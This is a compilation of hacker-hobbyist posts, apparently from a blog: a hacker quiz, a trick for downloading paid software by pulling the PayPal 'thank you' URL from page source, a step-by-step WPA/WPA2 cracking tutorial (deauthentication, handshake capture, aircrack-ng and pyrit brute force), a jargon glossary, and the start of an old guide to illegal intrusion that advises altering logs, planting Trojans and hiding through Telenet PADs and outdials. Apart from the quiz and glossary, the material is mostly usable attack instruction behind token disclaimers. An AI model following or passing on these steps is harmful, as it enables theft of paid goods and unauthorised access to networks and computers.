mumble "defocus" in your sleep?  0369 Do you know the max packet lifetime?       * Operating systems       Can you use 0370 ... BSD Unix? 0371 ... non-BSD Unix? 0372 ... AIX 0373 ... VM/CMS? 0374 ... VMS? 0375 ... MVS? 0376 ... VSE? 0377 ... RSTS/E? 0378 ... CP/M? 0379 ... COS? 0380 ... NOS? 0381 ... CP-67? 0382 ... RT-11? 0383 ... MS-DOS? 0384 ... Finder? 0385 ... PRODOS? 0386 ... more than one OS for the TRS-80? 0387 ... Tops-10? 0388 ... Tops-20? 0389 ... OS-9? 0390 ... OS/2? 0391 ... AOS/VS? 0392 ... Multics? 0393 ... ITS? 0394 ... Vulcan?  0395 Have you ever paged or swapped off a tape drive? 0396 ... Off a card reader/punch? 0397 ... Off a teletype? 0398 ... Off a networked (non-local) disk?  0399 Have you ever found an operating system bug? 0400 ... Did you exploit it? 0401 ... Did you report it? 0402 ... Was your report ignored?  0403 Have you ever crashed a machine? 0404 ... Intentionally?       * People  0405 Do you know any people? 0406 ... more than one? 0407 ... more than two?       * Personal  0408 Are your shoelaces untied?  0409 Do you interface well with strangers?  0410 Are you able to recite phone numbers for half-a-dozen computer systems         but unable to recite your own?  0411 Do you log in before breakfast?  0412 Do you consume more than LD-50 caffeine a day?  0413 Do you answer either-or questions with "yes"?  0414 Do you own an up-to-date copy of any operating system manual? 0415 ... *every* operating system manual?  0416 Do other people have difficulty using your customized environment?  0417 Do you dream in any programming languages?  0418 Do you have difficulty focusing on three-dimensional objects?  0419 Do you ignore mice?  0420 Do you despise the CAPS LOCK key?  0421 Do you believe menus belong in restaurants?  0422 Do you have a Mandelbrot hanging on your wall?  0423 Have you ever decorated with magnetic tape or punched cards? 0424 Do you have a disk platter or a naked floppy hanging in your home?  0425 Have you ever seen the dawn? 0426 ... Twice in a row?  0427 Do you use "foobar" in daily conversation? 0428 ... "bletch"?  0429 Do you use the "P convention"?  0430 Do you automatically respond to any user question with RTFM? 0431 ... Do you know what it means?  0432 Do you think garbage collection means memory management?  0433 Do you have problems allocating horizontal space in your room/office?  0434 Do you read Scientific American in bars to pick up women?  0435 Is your license plate computer-related?  0436 Have you ever taken the Purity test?  0437 Ever have an out-of-CPU experience?  0438 Have you ever set up a blind date over the computer?  0439 Do you talk to the person next to you via computer?       * Programming  0440 Can you write a Fortran compiler? 0441 ... In TECO?  0442 Can you read a machine dump? 0443 Can you disassemble code in your head?       Have you ever written 0444 ... a compiler? 0445 ... an operating system? 0446 ... a device driver? 0447 ... a text processor? 0448 ... a display hack? 0449 ... a database system? 0450 ... an expert system? 0451 ... an edge detector? 0452 ... a real-time control system? 0453 ... an accounting package? 0454 ... a virus? 0455 ... a prophylactic?  0456 Have you ever written a biorhythm program? 0457 ... Did you sell the output? 0458 ... Was the output arbitrarily invented?  0459 Have you ever computed pi to more than a thousand decimal places? 0460 ... the number e?  0461 Ever find a prime number of more than a hundred digits?  0462 Have you ever written self-modifying code? 0463 ... Are you proud of it?  0464 Did you ever write a program that ran correctly the first time? 0465 ... Was it longer than 20 lines? 0466 ... 100 lines? 0467 ... Was it in assembly language? 0468 ... Did it work the second time?  0469 Can you solve the Towers of Hanoi recursively? 0470 ... Non-recursively? 0471 ... Using the Troff text formatter?  0472 Ever submit an entry to the Obfuscated C code contest? 0473 ... Did it win? 0474 ... Did your entry inspire a new rule?  0475 Do you know Duff's device?  0476 Do you know Jensen's device?  0477 Ever spend ten minutes trying to find a single-character error? 0478 ... More than an hour? 0479 ... More than a day? 0480 ... More than a week? 0481 ... Did the first person you show it to find it immediately?       * Unix  0482 Can you use Berkeley Unix? 0483 .. Non-Berkeley Unix?  0484 Can you distinguish between sections 4 and 5 of the Unix manual?  0485 Can you find TERMIO in the System V release 2 documentation?  0486 Have you ever mounted a tape as a Unix file system?  0487 Have you ever built Minix?  0488 Can you answer "quiz function ed-command" correctly? 0489 ... How about "quiz ed-command function"?       * Usenet  0490 Do you read news? 0491 ... More than 32 newsgroups? 0492 ... More than 256 newsgroups? 0493 ... All the newsgroups?  0494 Have you ever posted an article? 0495 ... Do you post regularly?  0496 Have you ever posted a flame? 0497 ... Ever flame a cross-posting? 0498 ... Ever flame a flame? 0499 ... Do you flame regularly?  0500 Ever have your program posted to a source newsgroup?  0501 Ever forge a posting? 0502 Ever form a new newsgroup? 0503 ... Does it still exist?  0504 Do you remember 0505 ... mod.ber? 0506 ... the Stupid People's Court? 0507 ... Bandy-grams?       * Phreaking  0508 Have you ever built a black box?  0509 Can you name all of the 'colors' of boxes? 0510 ... and their associated functions?  0511 Does your touch tone phone have 16 DTMF buttons on it?  0512 Did the breakup of MaBell create more opportunities for you?   If you have any comments of suggestions regarding the HACKER TEST, Please send then krrishna.patil@gmail.com

Download from a paypal site without paying a penny!

Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:
Code:
http://www.ramphelp.com/halfpipe.html


About half way down the page you will find:

<input type="hidden" name="return" value="http://www.ramphelp.com/65984523/thanks/68912hp654/26865thankyouhp08363215423.html ">

Copy the link into your browser and download.

Note:- this post is for only information and educational purpose

WPA/WPA2 cracking with Back|Track 5

WPA/WPA2 cracking with Back|Track 5

Warning:- This tut is only for educational purpose ...



(A) General Display card

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

Step 3 (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel
           -w is the file to be written
           --bssid is the BSSID

This terminal is keeping running.

Step 6 :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step 7 :

Use the John the Ripper as word list to crack the WPA/WP2 password.

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

Step 8 (Optional) :

If you do not want to use John the Ripper as word list, you can use Crunch.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

(B) nVidia Display Card with CUDA

If you have nVidia card that with CUDA, you can use pyrit to crack the password with crunch.

Step a :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step b :

airmon-ng start wlan0

Step c (Optional) :

Change the mac address of the mon0 interface.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step d :

airodump-ng mon0

Then, press "Ctrl+c" to break the program.

Step e :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Step f :

open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -a is the BSSID
           -c is the client MAC address (STATION)

Wait for the handshake.

Step g :

If the following programs are not yet installed, please do it.

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step k (Optional) :

If you encounter error when reading the wpacrack-01.cap, you should do the following step.

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters.

Step l :

Then, you will see something similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

If you have an nVidia GeForce GTX460 (336 CUDA cores), the speed of cracking is about 17,000 passwords per second.

To test if your wireless card (either USB or PCI-e) can do the injection or not :

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

Make sure pyrit workable on your system :

pyrit list_cores

That's all! See you.

                    A Short 'HACKERSPEAK' Glossary
                              
 -
   A reference to a few of the terms used by many computer hackers.
                                 -
  ()
                                 -

arg - (argh) noun.  An argument, in the mathematical sense.

automagically - adverb.  Automatically, but in a way which, for some
reason (for example, because it's too complicated or too trivial) the
speaker doesn't feel like explaining.

bells and whistles - n.  Unnecessary (but often convenient, useful,
good-looking, or amusing) features of a program or other object. Added
to a bare-bones, working program.

bit - n.  1) A unit of information obtained by asking a question (e.g.
- 'I need a few bits about Punter protocol')  2) A mental flag;
reminder that something should be done eventually.

buffer - verb.  The act of saving or setting aside something to be done
later.  (e.g. - 'I'm going to buffer that and go eat now').

bug - n.  A problem or mistake; unwanted property or side effect.
Usually of a program, but can refer to a person.  Can be very simple or
very complicated.  Antonym: FEATURE.

bum - v.  To improve something by rearranging or removing its parts.
Most often done to a program to increase speed or save memory space,
usually at the expense of clarity.

buzz - v.  Of a program, to run without visible progress or certainty
of finishing.  Resembles CATATONIA except that a buzzing loop may
eventually end.

can
c22
onical - (ki NAHN i kil) adjective.  Standard, usual or ordinary way
of doing something.

catatonia - n.  A condition in which something is supposed to happen,
but nothing does.  (e.g. - Nothing you type will appear on the screen.
It's catatonic.  Often means a CRASH has occured.)

crash - 1) n.  Sudden, drastic failure.  Usually refers to a complete
computer system or program.  2) v.  To fail suddenly or cause to fail.
3) v.  Of people, to go to sleep.

creeping featurism - n.  Tendency for anything complicated to become
even more so because people keep saying, 'Hey, it would be terrific if
the program had this feature, and could do this, and...'  The result is
a patchwork program, confusing to read, with a lot of 'neat' features.

crock - n.  Said of a program that works, but in an extremely awkward
or cumbersome manner.

crunch - v.  To process, usually in a time-consuming, complex way.
Example:  Performing large, repetitive numerical computations is called
'number crunching'.  2) v.  To reduce the size of a file (often in a
complicated way) to save space.

dec'ed out - (decked out) adj.  Stoned, drunk (and possibly trying to
program, regardless).  Uncomplimentary.  Derives from the 65-- series
ML opcode DECrement, i.e.: decrease a value.

elegant - adj.  Said of a piece of code that does the RIGHT THING in a
way beautiful to look at.

feature - n.  An extra property or behaviour added to a program that
already does the job.  May or may not be useful, necessary or
convenient.

fencepost error - n.  A mathematical 'off-by-one' error.  Most often
found in programs that must count loops (it will count one time too
many, or too few).  Term comes from the problem:  'If you build a fence
100 feet long with posts 10 feet apart, how many posts fo you need?'
Example:  Suppose you want to process an array of items x thru y.  How
many are there?  The correct answer is x-y+1 (not x-y, which would be
off by one).

flavor - n. variety, kind, type.  (flavorful - adj.  Aesthetically
pleasing).

flush - v.  To scratch, delete or destroy something.  Often something
superfluous or useless.

fudge - v.  Perform in an incomplete, but marginally acceptable way.
'I fudged it, so it works.'

GC - (jee see) 1) v.  To clean up, throw away useless things.  2) To
forget.  GC is an abreviation of the term 'Garbage Collection', the
common method of freeing up memory space.

glitch - n.  Sudden interruption in electrical service, common sense,
or program function.  Usually happens only when you pray that it
doesn't.

grovel - v.  To work interminably, examine minutely or in extreme
detail.

gun - v.  To forcibly terminate a program.  'It was a boring display,
so I gunned it.'

hack - n.  An appropriate application of ingenuity.  It could be a
quick-and-dirty bug fix, or a time-consuming and elegant work of art.
A clever technique.

hack value - n.  The motivation for expending effort and time toward a
seemingly pointless goal, the point being the resulting hack.

hack attack - n.  Period of greatly increased hacking activity.  Not to
be
d2a
 confused with a Mac-Attack.

hacker - n.  1) One who greatly enjoys learning the details of a
computer system and how to stretch their capabilities (as opposed to
REAL USERS who learn only the minimum amount necessary).  2) One who
programs enthusiastically, rather than just theorizing about it.  3)
One capable of appreciating HACK VALUE.  4) An expert of any kind  5) A
malicious or inquisitive meddler (in the case of a 'system hacker' or a
'password hacker').

inc it up - (also 'incing') v.  Specifically related to studying,
reading, or learning ML.  Derives from the 65-- series ML instruction
INCrement a value; i.e. increase it.

jock - n.  Programmer characterized by the large, cumbersome,
brute-force programs he/she writes.  The programs may work, but slowly,
inelegantly, or in an ugly way.

kludge - (kloog)  1) n.  Clever programming trick, most often to fix a
bug.  Efficient, but maybe unclear.  2) v.  To insert a kludge into a
program (to fix a bug or add a feature).

magic - adj.  Something as yet unexplained or too complex to imagine.

M&M's - n.  Mental and Midget; i.e. Mental Midget.  Uncomplimentary
term applied most often to 'system hackers' who intrude for disruptive
or destructive purposes (like to crash BBS's).

misfeature - n.  A FEATURE that eventually turns out to be more trouble
than it was worth, possibly because it is inadequate for a new user or
situation that has evolved.  Misfeatures are different from bugs or
side-effects in that they are often more basic to the program design
and, at one time, were carefully planned.

moby - 1) adj.  Immense, complex, or impressive.  2) n.  Total size of
a computers address space.

mode - n.  A general state.  Examples:  DAY MODE - state a person is in
when s/he is working days and sleeping nights.

mumble - interjection.  Said when the correct response is too
complicated to put into words or has not been thought out.  Can
indicate a reluctance to enter a long discussion.

mumblage - n.  The subject matter of one's mumbling.  Replaces 'all
that stuff'.

nop around (or nopping) - v.  Hanging out; not doing much; not
programming.  Derives from the 65-- series ML instruction code 'NOP'
(No OPeration).

obie (or o.b.) - n.  Derives from a pun with the word 'OverByte'.
Usually relates to a ML routine that doesn't work because of some
small mistake, possibly an incorrect addressing mode or even a typing
error.  Most often one or two bytes wrong.

patch - 1) n.  Piece of code intended as a quick-and-dirty remedy to a
BUG or MISFEATURE.  2) v.  To fix something temporarily; insert a patch
into a piece of code; make the main program machine-specific.

punt - v.  To give up; decide not to do.

rave - v.  1) To persist in discussing something.  2) To speak
authoritatively about that which one knows very little.  3) To
proselytize.

real user - n.  A commercial user; a non-hacker who uses computer
applications only.

Real World, The - n.  1) Places where programs have only business
applications.  2) Institutions such as IBM.  3) The location of
non-programmers and non-programming activity.  The first two
definitions are uncomplimentary; the third is not.

Right Thing, The - n.  that which is obviously the appropriate thing to
use, do, say, etc.

rude - (rood or roo-day) adj.  Programs badly written or functionally
poor.


5a3
sacred - adj.  Reserved for the exclusive use of something.  Usually
refers to memory location or register that shouldn't be used because
what is stored there must not change.

slurp - v.  To read a large data file into memory before using or
processing data.

smart - adj.  Said of a program (or something) that does THE RIGHT
THING.

SMOP - n.  An acronym for a 'Small Matter Of Programming'.  A piece of
code that would not at all be hard to write, but would take a very long
time because of its size.  Not worth the trouble.

snail mail - n.  Mail sent via Post Office, rather than electronically.

software rot - n.  Hypothetical disease that causes working programs to
stop working when unused for a period of time.

tense - adj.  Of programs, very clever and efficient.  A tense
programmer produces tense code.

vanilla - adj.  Standard, usual, or ordinary FLAVOR.

zero - v.  1) To set a bit or variable to zero.  2) To erase, or
discard all data from.

zorch - v.  1) To move quickly.  2) Influences.  3) Energy or ability.

                                                                                                                                                                                                                                                                                                                                                                                 Destroyer The King     

A Novice's Guide

    **********************************************************************|
    **********************************************************************

Introduction: The State of the Hack
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   After surveying a rather large g-file collection, my attention was drawn to
the fact that there hasn't been a good introductory file written for absolute
beginners since back when Mark Tabas was cranking them out (and almost
*everyone* was a beginner!)  The Arts of Hacking and Phreaking have changed
radically since that time, and as the 90's approach, the hack/phreak community
has recovered from the Summer '87 busts (just like it recovered from the Fall
'85 busts, and like it will always recover from attempts to shut it down), and
the progressive media (from Reality Hackers magazine to William Gibson and
Bruce Sterling's cyberpunk fables of hackerdom) is starting to take notice
of us for the first time in recent years in a positive light.
   Unfortunately, it has also gotten more dangerous since the early 80's.
Phone cops have more resources, more awareness, and more intelligence that they
exhibited in the past.  It is becoming more and more difficult to survive as
a hacker long enough to become skilled in the art.  To this end this file
is dedicated .  If it can help someone get started, and help them survive
to discover new systems and new information, it will have served it's purpose,
and served as a partial repayment to all the people who helped me out when I
was a beginner.

Contents
~~~~~~~~
   This file will be divided into four parts:
       Part 1: What is Hacking, A Hacker's Code of Ethics, Basic Hacking Safety
       Part 2: Packet Switching Networks: Telenet- How it Works, How to Use it,
               Outdials, Network Servers, Private PADs
       Part 3: Identifying a Computer, How to Hack In, Operating System
               Defaults
       Part 4: Conclusion- Final Thoughts, Books to Read, Boards to Call,
               Acknowledgements

Part One: The Basics
~~~~~~~~~~~~~~~~~~~~
    As long as there have been computers, there have been hackers.  In the 50's
at the Massachusets Institute of Technology (MIT), students devoted much time
and energy to ingenious exploration of the computers.  Rules and the law were
disregarded in their pursuit for the 'hack'.  Just as they were enthralled with
their pursuit of information, so are we.  The thrill of the hack is not in
breaking the law, it's in the pursuit and capture of knowledge.
    To this end, let me contribute my suggestions for guidelines to follow to
ensure that not only you stay out of trouble, but you pursue your craft without
damaging the computers you hack into or the companies who own them.

I.    Do not intentionally damage *any* system.
II.   Do not alter any system files other than ones needed to ensure your
      escape from detection and your future access (Trojan Horses, Altering
      Logs, and the like are all necessary to your survival for as long as
      possible.)
III.  Do not leave your (or anyone else's) real name, real handle, or real
      phone number on any system that you access illegally.  They *can* and
      will track you down from your handle!
IV.   Be careful who you share information with.  Feds are getting trickier.
      Generally, if you don't know their voice phone number, name, and
      occupation or haven't spoken with them voice on non-info trading
      conversations, be wary.

V.    Do not leave your real phone number to anyone you don't know.  This
      includes logging on boards, no matter how k-rad they seem.  If you
      don't know the sysop, leave a note telling some trustworthy people
      that will validate you.
VI.   Do not hack government computers.  Yes, there are government systems
      that are safe to hack, but they are few and far between.  And the
      government has inifitely more time and resources to track you down than
      a company who has to make a profit and justify expenses.
VII.  Don't use codes unless there is *NO* way around it (you don't have a
      local telenet or tymnet outdial and can't connect to anything 800...)
      You use codes long enough, you will get caught.  Period.
VIII. Don't be afraid to be paranoid.  Remember, you *are* breaking the law.
      It doesn't hurt to store everything encrypted on your hard disk, or
      keep your notes buried in the backyard or in the trunk of your car.
      You may feel a little funny, but you'll feel a lot funnier when you
      when you meet Bruno, your transvestite cellmate who axed his family to
      death.
IX.   Watch what you post on boards.  Most of the really great hackers in the
      country post *nothing* about the system they're currently working
      except in the broadest sense (I'm working on a UNIX, or a COSMOS, or
      something generic.  Not "I'm hacking into General Electric's Voice Mail
      System" or something inane and revealing like that.)
X.    Don't be afraid to ask questions.  That's what more experienced hackers
      are for.  Don't expect *everything* you ask to be answered, though.
      There are some things (LMOS, for instance) that a begining hacker
      shouldn't mess with.  You'll either get caught, or screw it up for
      others, or both.
XI.   Finally, you have to actually hack.  You can hang out on boards all you
      want, and you can read all the text files in the world, but until you
      actually start doing it, you'll never know what it's all about.  There's
      no thrill quite the same as getting into your first system (well, ok,
      I can think of a couple of bigger thrills, but you get the picture.)

   One of the safest places to start your hacking career is on a computer
system belonging to a college.  University computers have notoriously lax
security, and are more used to hackers, as every college computer depart-
ment has one or two, so are less likely to press charges if you should
be detected.  But the odds of them detecting you and having the personel to
committ to tracking you down are slim as long as you aren't destructive.
   If you are already a college student, this is ideal, as you can legally
explore your computer system to your heart's desire, then go out and look
for similar systems that you can penetrate with confidence, as you're already
familar with them.
   So if you just want to get your feet wet, call your local college.  Many of
them will provide accounts for local residents at a nominal (under $20) charge.
   Finally, if you get caught, stay quiet until you get a lawyer.  Don't vol-
unteer any information, no matter what kind of 'deals' they offer you. 
Nothing is binding unless you make the deal through your lawyer, so you might
as well shut up and wait.

Part Two: Networks
~~~~~~~~~~~~~~~~~~
   The best place to begin hacking (other than a college) is on one of the
bigger networks such as Telenet.  Why?  First, there is a wide variety of
computers to choose from, from small Micro-Vaxen to huge Crays.  Second, the
networks are fairly well documented.  It's easier to find someone who can help
you with a problem off of Telenet than it is to find assistance concerning your
local college computer or high school machine.  Third, the networks are safer.
Because of the enormous number of calls that are fielded every day by the big
networks, it is not financially practical to keep track of where every call and
connection are made from.  It is also very easy to disguise your location using
the network, which makes your hobby much more secure.
   Telenet has more computers hooked to it than any other system in the world
once you consider that from Telenet you have access to Tymnet, ItaPAC, JANET,
DATAPAC, SBDN, PandaNet, THEnet, and a whole host of other networks, all of
which you can connect to from your terminal.
   The first step that you need to take is to identify your local dialup port.
This is done by dialing 1-800-424-9494 (1200 7E1) and connecting.  It will
spout some garbage at you and then you'll get a prompt saying 'TERMINAL='.
This is your terminal type.  If you have vt100 emulation, type it in now.  Or
just hit return and it will default to dumb terminal mode.
   You'll now get a prompt that looks like a @.  From here, type @c mail <cr>
and then it will ask for a Username.  Enter 'phones' for the username. When it
asks for a password, enter 'phones' again.  From this point, it is menu
driven.  Use this to locate your local dialup, and call it back locally.  If
you don't have a local dialup, then use whatever means you wish to connect to
one long distance (more on this later.)
   When you call your local dialup, you will once again go through the
TERMINAL= stuff, and once again you'll be presented with a @.  This prompt lets
you know you are connected to a Telenet PAD.  PAD stands for either Packet
Assembler/Disassembler (if you talk to an engineer), or Public Access Device
(if you talk to Telenet's marketing people.)  The first description is more
correct.
   Telenet works by taking the data you enter in on the PAD you dialed into,
bundling it into a 128 byte chunk (normally... this can be changed), and then
transmitting it at speeds ranging from 9600 to 19,200 baud to another PAD, who
then takes the data and hands it down to whatever computer or system it's
connected to.  Basically, the PAD allows two computers that have different baud
rates or communication protocols to communicate with each other over a long
distance.  Sometimes you'll notice a time lag in the remote machines response.
This is called PAD Delay, and is to be expected when you're sending data
through several different links.
   What do you do with this PAD?  You use it to connect to remote computer
systems by typing 'C' for connect and then the Network User Address (NUA) of
the system you want to go to.
   An NUA takes the form of   031103130002520
                              \___/\___/\___/
                                |    |    |
                                |    |    |____ network address
                                |    |_________ area prefix
                                |______________ DNIC


     This is a summary of DNIC's (taken from Blade Runner's file on ItaPAC)
     according to their country and network name.


DNIC   Network Name    Country          DNIC   Network Name    Country
_______________________________________________________________________________
                                     |
02041   Datanet 1       Netherlands  |  03110   Telenet         USA
02062   DCS             Belgium      |  03340   Telepac         Mexico
02080   Transpac        France       |  03400   UDTS-Curacau    Curacau
02284   Telepac         Switzerland  |  04251   Isranet         Israel
02322   Datex-P         Austria      |  04401   DDX-P           Japan
02329   Radaus          Austria      |  04408   Venus-P         Japan
02342   PSS             UK           |  04501   Dacom-Net       South Korea
02382   Datapak         Denmark      |  04542   Intelpak        Singapore
02402   Datapak         Sweden       |  05052   Austpac         Australia
02405   Telepak         Sweden       |  05053   Midas           Australia
02442   Finpak          Finland      |  05252   Telepac         Hong Kong
02624   Datex-P         West Germany |  05301   Pacnet          New Zealand
02704   Luxpac          Luxembourg   |  06550   Saponet         South Africa
02724   Eirpak          Ireland      |  07240   Interdata       Brazil
03020   Datapac         Canada       |  07241   Renpac          Brazil
03028   Infogram        Canada       |  09000   Dialnet         USA
03103   ITT/UDTS        USA          |  07421   Dompac          French Guiana
03106   Tymnet          USA          |

   There are two ways to find interesting addresses to connect to.  The first
and easiest way is to obtain a copy of the LOD/H Telenet Directory from the
LOD/H Technical Journal #4 or 2600 Magazine.  Jester Sluggo also put out a good
list of non-US addresses in Phrack Inc. Newsletter Issue 21.  These files will
tell you the NUA, whether it will accept collect calls or not, what type of
computer system it is (if known) and who it belongs to (also if known.)
   The second method of locating interesting addresses is to scan for them
manually.  On Telenet, you do not have to enter the 03110 DNIC to connect to a
Telenet host.  So if you saw that 031104120006140 had a VAX on it you wanted to
look at, you could type @c 412 614 (0's can be ignored most of the time.)
   If this node allows collect billed connections, it will say 412 614
CONNECTED and then you'll possibly get an identifying header or just a
Username: prompt.  If it doesn't allow collect connections, it will give you a
message such as 412 614 REFUSED COLLECT CONNECTION with some error codes out to
the right, and return you to the @ prompt.
   There are two primary ways to get around the REFUSED COLLECT message.  The
first is to use a Network User Id (NUI) to connect.  An NUI is a username/pw
combination that acts like a charge account on Telenet.  To collect to node
412 614 with NUI junk4248, password 525332, I'd type the following:
@c 412 614,junk4248,525332  <---- the 525332 will *not* be echoed to the
screen.  The problem with NUI's is that they're hard to come by unless you're
a good social engineer with a thorough knowledge of Telenet (in which case
you probably aren't reading this section), or you have someone who can
provide you with them.
   The second way to connect is to use a private PAD, either through an X.25
PAD or through something like Netlink off of a Prime computer (more on these
two below.)
   The prefix in a Telenet NUA oftentimes (not always) refers to the phone Area
Code that the computer is located in (i.e. 713 xxx would be a computer in
Houston, Texas.)  If there's a particular area you're interested in, (say,
New York City 914), you could begin by typing @c 914 001 <cr>.  If it connects,
you make a note of it and go on to 914 002.  You do this until you've found
some interesting systems to play with.
   Not all systems are on a simple xxx yyy address.  Some go out to four or
five digits (914 2354), and some have decimal or numeric extensions
(422 121A = 422 121.01).  You have to play with them, and you never know what
you're going to find.  To fully scan out a prefix would take ten million
attempts per prefix.  For example, if I want to scan 512 completely, I'd have
to start with 512 00000.00 and go through 512 00000.99, then increment the
address by 1 and try 512 00001.00 through 512 00001.99.  A lot of scanning.
There are plenty of neat computers to play with in a 3-digit scan, however,
so don't go berserk with the extensions.
   Sometimes you'll attempt to connect and it will just be sitting there after
one or two minutes.  In this case, you want to abort the connect attempt by
sending a hard break (this varies with different term programs, on Procomm,
it's ALT-B), and then when you get the @ prompt back, type 'D' for disconnect.
   If you connect to a computer and wish to disconnect, you can type <cr> @
<cr> and you it should say TELENET and then give you the @ prompt.  From there,
type D to disconnect or CONT to re-connect and continue your session
uninterrupted.

Outdials, Network Servers, and PADs
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   In addition to computers, an NUA may connect you to several other things.
One of the most useful is the outdial.  An outdial is nothing more than a modem
you can get to over telenet- similar to the PC Pursuit concept, except that
these don't have passwords on them most of the time.
   When you connect, you will get a message like 'Hayes 1200 baud outdial,
Detroit, MI', or 'VEN-TEL 212 Modem', or possibly 'Session 1234 established
on Modem 5588'.  The best way to figure out the commands on these is to
type ? or H or HELP- this will get you all the information that you need to
use one.
   Safety tip here- when you are hacking *any* system through a phone dialup,
always use an outdial or a diverter, especially if it is a local phone number
to you.  More people get popped hacking on local computers than you can
imagine, Intra-LATA calls are the easiest things in the world to trace inexp-
ensively.
   Another nice trick you can do with an outdial is use the redial or macro
function that many of them have.  First thing you do when you connect is to
invoke the 'Redial Last Number' facility.  This will dial the last number used,
which will be the one the person using it before you typed.  Write down the
number, as no one would be calling a number without a computer on it.  This
is a good way to find new systems to hack.  Also, on a VENTEL modem, type 'D'
for Display and it will display the five numbers stored as macros in the
modem's memory.
   There are also different types of servers for remote Local Area Networks
(LAN) that have many machine all over the office or the nation connected to
them.  I'll discuss identifying these later in the computer ID section.
   And finally, you may connect to something that says 'X.25 Communication
PAD' and then some more stuff, followed by a new @ prompt.  This is a PAD
just like the one you are on, except that all attempted connections are billed
to the PAD, allowing you to connect to those nodes who earlier refused collect
connections.
   This also has the added bonus of confusing where you are connecting from.
When a packet is transmitted from PAD to PAD, it contains a header that has
the location you're calling from.  For instance, when you first connected
to Telenet, it might have said 212 44A CONNECTED if you called from the 212
area code.  This means you were calling PAD number 44A in the 212 area.
That 21244A will be sent out in the header of all packets leaving the PAD.
   Once you connect to a private PAD, however, all the packets going out
from *it* will have it's address on them, not yours.  This can be a valuable
buffer between yourself and detection.

Phone Scanning
~~~~~~~~~~~~~~
   Finally, there's the time-honored method of computer hunting that was made
famous among the non-hacker crowd by that Oh-So-Technically-Accurate movie
Wargames.  You pick a three digit phone prefix in your area and dial every
number from 0000 --> 9999 in that prefix, making a note of all the carriers
you find.  There is software available to do this for nearly every computer
in the world, so you don't have to do it by hand.

Part Three: I've Found a Computer, Now What?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
   This next section is applicable universally.  It doesn't matter how you
found this computer, it could be through a network, or it could be from
carrier scanning your High School's phone prefix, you've got this prompt
this prompt, what the hell is it?
   I'm *NOT* going to attempt to tell you what to do once you're inside of
any of these operating systems.  Each one is worth several G-files in its
own right.  I'm going to tell you how to identify and recognize certain
OpSystems, how to approach hacking into them, and how to deal with something
that you've never seen before and have know idea what it is.


VMS-       The VAX computer is made by Digital Equipment Corporation (DEC),
           and runs the VMS (Virtual Memory System) operating system.
           VMS is characterized by the 'Username:' prompt.  It will not tell
           you if you've entered a valid username or not, and will disconnect
           you after three bad login attempts.  It also keeps track of all
           failed login attempts and informs the owner of the account next time
           s/he logs in how many bad login attempts were made on the account.
